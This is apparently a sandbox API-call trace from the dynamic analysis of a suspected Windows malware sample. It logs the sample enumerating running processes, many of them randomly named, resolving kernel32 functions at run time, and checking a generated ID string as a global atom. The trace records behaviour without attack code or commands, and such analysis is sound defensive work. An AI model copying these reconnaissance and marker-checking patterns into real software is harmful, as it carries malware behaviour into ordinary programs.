	[0127.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.428] CloseHandle (hObject=0x2dc) returned 1
	[0127.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.428] CloseHandle (hObject=0x2dc) returned 1
	[0127.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.429] CloseHandle (hObject=0x2dc) returned 1
	[0127.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.429] CloseHandle (hObject=0x2dc) returned 1
	[0127.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.429] CloseHandle (hObject=0x2dc) returned 1
	[0127.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.430] CloseHandle (hObject=0x2dc) returned 1
	[0127.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.430] CloseHandle (hObject=0x2dc) returned 1
	[0127.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.431] CloseHandle (hObject=0x2dc) returned 1
	[0127.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.431] CloseHandle (hObject=0x2dc) returned 1
	[0127.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.431] CloseHandle (hObject=0x2dc) returned 1
	[0127.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.432] CloseHandle (hObject=0x2dc) returned 1
	[0127.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.432] CloseHandle (hObject=0x2dc) returned 1
	[0127.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.433] CloseHandle (hObject=0x2dc) returned 1
	[0127.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.433] CloseHandle (hObject=0x2dc) returned 1
	[0127.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.433] CloseHandle (hObject=0x2dc) returned 1
	[0127.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.434] CloseHandle (hObject=0x2dc) returned 1
	[0127.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.434] CloseHandle (hObject=0x2dc) returned 1
	[0127.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.435] CloseHandle (hObject=0x2dc) returned 1
	[0127.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.435] CloseHandle (hObject=0x2dc) returned 1
	[0127.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.436] CloseHandle (hObject=0x2dc) returned 1
	[0127.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.436] CloseHandle (hObject=0x2dc) returned 1
	[0127.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.436] CloseHandle (hObject=0x2dc) returned 1
	[0127.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.437] CloseHandle (hObject=0x2dc) returned 1
	[0127.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.437] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetLastError () returned 0x5
	[0127.438] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.438] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.439] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.439] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.440] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetLastError () returned 0x5
	[0127.441] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.441] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.442] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.442] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.442] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.442] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.442] CloseHandle (hObject=0x2dc) returned 1
	[0127.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.442] CloseHandle (hObject=0x2dc) returned 1
	[0127.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.443] CloseHandle (hObject=0x2dc) returned 1
	[0127.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.443] CloseHandle (hObject=0x2dc) returned 1
	[0127.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.443] CloseHandle (hObject=0x2dc) returned 1
	[0127.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.444] CloseHandle (hObject=0x2dc) returned 1
	[0127.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.482] CloseHandle (hObject=0x2dc) returned 1
	[0127.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
